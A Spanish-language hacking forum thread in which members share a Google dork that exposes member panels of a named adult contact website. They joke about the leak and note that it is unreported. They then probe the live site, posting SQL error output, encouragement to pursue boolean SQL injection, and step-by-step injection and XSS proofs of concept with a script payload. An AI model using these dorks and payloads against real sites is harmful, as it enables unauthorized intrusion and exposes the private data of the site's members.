This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

[Google Hacking] Leak de Britishsexcontacts!!!

  • 10 Replies
  • 7654 Views

0 Members and 1 Guest are viewing this topic.

Offline Rootkit_Pentester

  • *
  • Underc0der
  • Posts: 214
  • Actividad:
    0%
  • Reputación 8
    • View Profile
    • Email

[Google Hacking] Leak de Britishsexcontacts!!!

  • on: March 23, 2017, 11:22:40 pm
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

You are not allowed to view links. Register or Login

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

Offline novak

  • *
  • Underc0der
  • Posts: 102
  • Actividad:
    0%
  • Reputación 1
    • View Profile
    • Email

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: March 24, 2017, 12:22:58 pm
No podías utilizarlo en una floristería o en una empresa de oficinas heeee. ;D ;D ;D ;D ;D


Offline Rootkit_Pentester

  • *
  • Underc0der
  • Posts: 214
  • Actividad:
    0%
  • Reputación 8
    • View Profile
    • Email

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: March 24, 2017, 07:58:56 pm
jajaja muy buena!!!.

Offline DUDA

  • *
  • Underc0der
  • Posts: 337
  • Actividad:
    0%
  • Reputación 1
  • Hago pocas cosas, pero las hago bien.
    • View Profile

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: March 28, 2017, 06:08:29 pm
You are not allowed to view links. Register or Login
No lo he reportado todavia al admin!!!.

Ya entiendo porque  8)

Offline n0z

  • *
  • Underc0der
  • Posts: 44
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • Email

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: March 28, 2017, 09:13:58 pm
Les cuento que jugando un poco con esto consegui un sql error. No lo he tratado de explotar aun

Offline mahajan344

  • *
  • Underc0der
  • Posts: 1
  • Actividad:
    0%
  • Reputación 0
    • View Profile

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: April 29, 2017, 06:27:11 am
they have fixed it

Offline baah

  • *
  • Underc0der
  • Posts: 11
  • Actividad:
    0%
  • Country: 00
  • Reputación 1
  • Let´s go to find hacks!
    • View Profile
    • informaticaparagallinas
You are not allowed to view links. Register or Login
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

You are not allowed to view links. Register or Login

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!
Comprueba si tus datos han sido publicados haciendo click en la siguiente imagen:


You are not allowed to view links. Register or Login

Offline Rootkit_Pentester

  • *
  • Underc0der
  • Posts: 214
  • Actividad:
    0%
  • Reputación 8
    • View Profile
    • Email
You are not allowed to view links. Register or Login
Quote
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!

Gracias. Un saludo capo!. Y esperamos tus aportes!!!.

Offline Hach8D

  • *
  • Underc0der
  • Posts: 3
  • Actividad:
    0%
  • Reputación 1
    • View Profile
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

Quote
Password Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26


Offline sadfud

  • *
  • Moderator
  • Posts: 214
  • Actividad:
    0%
  • Country: cl
  • Reputación 11
    • View Profile
    • Blog
You are not allowed to view links. Register or Login
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

Quote
Password Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Posiblemente vulnerable a sqli con booleanos, sigue por ese camino :D
Mi blog: You are not allowed to view links. Register or Login
Si necesitas ayuda, no dudes en mandar MP

Online Drok3r

  • *
  • Underc0der
  • Posts: 51
  • Actividad:
    0%
  • Country: tr
  • Reputación 1
  • Twitter: @drok3r
    • View Profile
    • RedBird Seguridad Ofensiva
    • Email

Re:[Google Hacking] Leak de Britishsexcontacts!!!

  • on: June 09, 2018, 09:19:25 pm
Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS

--> SQL INJECTION
You are not allowed to view links. Register or Login'

[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;

-->XSS y SQL INJECTION
PoC_1

1.- En la pagina principal (You are not allowed to view links. Register or Login) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert

:3

--> XSS
PoC
1.- ingresamos a la pagina principal (You are not allowed to view links. Register or Login)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: You are not allowed to view links. Register or Login'"><script>alert(/X/)</script> y listo